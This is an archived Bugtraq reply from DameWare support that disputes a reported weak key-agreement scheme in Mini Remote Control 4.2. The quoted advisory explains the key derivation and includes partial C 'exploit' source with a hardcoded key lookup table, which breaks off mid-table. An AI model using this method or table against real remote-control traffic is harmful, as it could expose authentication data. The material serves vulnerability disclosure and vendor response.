Re: (HOAX) Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme

[DameWare Support <support () dameware com>]

In-Reply-To: <20040430182646.29912.qmail () www securityfocus com>


This is definitely not an exploit, nor is it a vulnerability and therefore inaccurate & misleading. Furthermore, the 
information submitted by ax09001h () hotmail com has nothing to do with obtaining the Session Encryption Key, nor does 
it reveal any confidential information. It is entirely "pre-authentication" information that has nothing to do with the 
Session Encryption Key, and it cannot be used to obtain the actual Session Encryption Key.

The "Pre Authentication" data that is being encrypted/decrypted at this point in the remote control connection is not 
sensitive information and could just as well be sent in plain text.  This so called "weak key" is not used for 
encrypting sensitive data and is only is used once for a single transmission of pre authentication data.

ax09001h () hotmail com made no attempts to contact DameWare Development directly to verify this claim before releasing 
the information. It is extremely irresponsible for anyone to release this kind of information without first contacting 
the vendor to verify its accuracy. Based on his or her actions it's fairly obvious that this anonymous person and or 
company are deliberately attempting to discredit DameWare Development & it's Mini Remote Control program.

Support Staff
DameWare Development, LLC.
http://www.dameware.com

> Received: (qmail 2813 invoked from network); 30 Apr 2004 19:34:03 -0000
> Received: from outgoing3.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.27)
>  by mail.securityfocus.com with SMTP; 30 Apr 2004 19:34:03 -0000
> Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>       by outgoing.securityfocus.com (Postfix) with QMQP
>       id EE330236FDE; Fri, 30 Apr 2004 21:27:49 -0600 (MDT)
> Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
> Precedence: bulk
> List-Id: <bugtraq.list-id.securityfocus.com>
> List-Post: <mailto:bugtraq () securityfocus com>
> List-Help: <mailto:bugtraq-help () securityfocus com>
> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
> Delivered-To: mailing list bugtraq () securityfocus com
> Delivered-To: moderator for bugtraq () securityfocus com
> Received: (qmail 16648 invoked from network); 30 Apr 2004 12:57:51 -0000
> Date: 30 Apr 2004 18:26:46 -0000
> Message-ID: <20040430182646.29912.qmail () www securityfocus com>
> Content-Type: text/plain
> Content-Disposition: inline
> Content-Transfer-Encoding: binary
> MIME-Version: 1.0
> X-Mailer: MIME-tools 5.411 (Entity 5.404)
> From: ax09001h <ax09001h () hotmail com>
> To: bugtraq () securityfocus com
> Subject: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
>
>
>
> Title: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
>
> Versions:      Dameware Mini Remote Control Version 4.2
>               
>
> Vulnerability: The latest version of Dameware?s Mini Remote Control System uses a weak key agreement scheme.  The 
> scheme consists of the sharing of pointers into a fixed key lookup table.  Both the client and the server have access 
> to a key lookup table (KLT) consisting of 1000 32-bit values.    Prior to encrypting traffic the server sends to the 
> client a series of 32-bit integers, call it the key index table (KIT).  For the sake of description lets call the 
> indices klt_idx[4], an array of 4 32-bit integers.  The klt_idx are set as follows:
>
> klt_idx[0] = KIT[100];
> klt_idx[1] = KIT[4];
> klt_idx[2] = 42;
> klt_idx[3] = KIT[37];
>
> The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.
>
>       sk[0] = KLT[klt_idx[0]];
>       sk[1] = KLT[klt_idx[1]]; 
>       sk[2] = KLT[klt_idx[2]];
>       sk[3] = KLT[klt_idx[3]];
>
> This of course produces 0-bits of security.
>
> They proceed to correct the Electronic Code Book mode of encrypting other authentication packets using the above 
> constructed key using Blowfish in cipher block chaining mode with an IV = 0.  
>
> Exploit:
>
> /*
>
>       dwgenkey.c                      dameware generate key program.
>
>                                       this function mimics the dameware
>                                       key generation algorithm used to 
>                                       pass encrypted windows authentication 
>                                       across between client and server
>                       
>
>                                       ax09001h () hotmail com
>
>
> */
>
>
> #include <stdio.h>
> #include <stdlib.h>
>
>
> unsigned int   KLT [1000] = 
> {
>       0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
>       0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
>       0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29,     0x48A20FA2, 
>       0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB,     0xBC2B83CD, 
>       0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058,     0x5474C05, 
>       0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A,     0xCFA8D725, 
>       0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762, 
>       0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88, 
>       0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B, 
>       0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE, 
>       0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096, 
>       0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089, 
>       0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E, 
>       0xB9F8AF1C, 0xF797E46C, 0x5F2F339D,     0xB792AB5F, 0x462050F7, 0xF922EDBD, 
>       0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821, 
>       0xAA69288,  0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23, 
>       0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E, 
>       0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3, 
>       0xFD572127,     0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7, 
>       0x1093FA43,     0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
>       0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
>       0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
>       0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
>       0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
>       0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
>       0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22,     0x7A153138, 
>       0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E,     0x2E464810, 
>       0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0, 
>       0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642, 
>       0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7, 
>       0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA, 
>       0xE5209EFB, 0x1A4E0702, 0xD8B6C71,      0xDA3EAE89, 0xA1A00078, 0xB55B5C3E, 
>       0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D, 
>       0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E, 
>       0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1, 
>       0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244, 
>       0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86, 
>       0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E, 
>       0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B, 
>       0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC, 
>       0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0, 
>       0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9, 
>       0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C, 
>       0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6, 
>       0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61, 
>       0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4, 
>       0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF, 
>       0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
>       0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
>       0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
>       0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6,     0xF53E8558, 
>       0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C, 
>       0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8, 
>       0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809, 
>       0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856, 
>       0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB, 
>       0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9, 
>       0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405, 
>       0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B, 
>       0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D, 
>       0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942, 
>       0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04, 
>       0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D, 
>       0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621, 
>       0xC421154,  0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
>       0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
>       0x7C07054,  0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9,  0x27C3B146,
>       0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
>       0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
>       0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
>       0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81,     0x98E93630, 
>       0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8,     0xAF2A72E8, 
>       0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601, 
>       0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6,     0xA3C182A3, 
>       0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2, 
>       0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A,  0xA45A497, 
>       0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C, 
>       0x67DEDD8,  0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1, 
>       0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2, 
>       0x76E7D2A6, 0x536501F,  0xC77CA12B,     0x5E6E2842, 0x9896F26C, 0x2BC45D27, 
>       0xE2FF89C7, 0x11FBC8C,  0x252652BD,     0x61AA26A4, 0xF3DF28A,  0xAFB90C39, 
>       0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE,     0x2630C3A2, 0xC0F995BC, 0x27677058, 
>       0x49E5FA9C, 0x3B66C518, 0x7654283D,     0xB8305341, 0x72E94CF,  0x3E181088, 
>       0x9F721122, 0xC536D545, 0x8BD48FE7,     0xA0899C0F, 0x950D4B9C, 0xCDFA8F86, 
>       0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C, 
>       0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C, 
>       0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D, 
>       0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4, 
>       0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B, 
>       0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990, 
>       0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265,  0x384C4B56, 
>       0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9, 
>       0xC144F12E,     0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3, 
>       0x6B32E419,     0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
>       0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA63